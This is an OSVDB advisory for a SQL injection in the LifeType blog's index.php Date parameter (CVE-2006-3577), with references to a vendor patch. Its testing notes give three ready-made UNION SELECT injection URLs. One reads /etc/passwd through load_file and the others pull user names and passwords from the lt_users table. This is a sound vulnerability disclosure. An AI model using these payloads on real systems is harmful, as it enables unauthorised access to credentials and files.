LifeType index.php Date Variable SQL Injection

2006-07-05T00:00:08
ID OSVDB:28180
Type osvdb
Reporter OSVDB
Modified 2006-07-05T00:00:08

Description

Manual Testing Notes

http://[target]/index.php?op=Default&Date=200607\'%20UNION%20SELECT%201,load_file("/etc/passwd"),1,1,1,1,1,1,1,1%20FROM%20lt_users%20WHERE%20id=\'1\'/&blogId=1'"
http://[target]/index.php?op=Default&Date=200607\'%20UNION%20SELECT%201,password,1,1,1,1,1,1,1,1%20FROM%20lt_users%20WHERE%20id=\'1\'/&blogId=1'"
http://[target]/index.php?op=Default&Date=200607\'%20UNION%20SELECT%201,user,1,1,1,1,1,1,1,1%20FROM%20lt_users%20WHERE%20id=\'1\'/*&blogId=1'"

References:

Vendor URL: http://www.lifetype.net/blog.php/lifetype_development_journal/2006/06/04/important_security_upgrade_lifetype_1.0.5_released
Related OSVDB ID: 28181
Other Advisory URL: http://osvdb.org/ref/28/28180-lifetype.txt
CVE-2006-3577
Bugtraq ID: 18835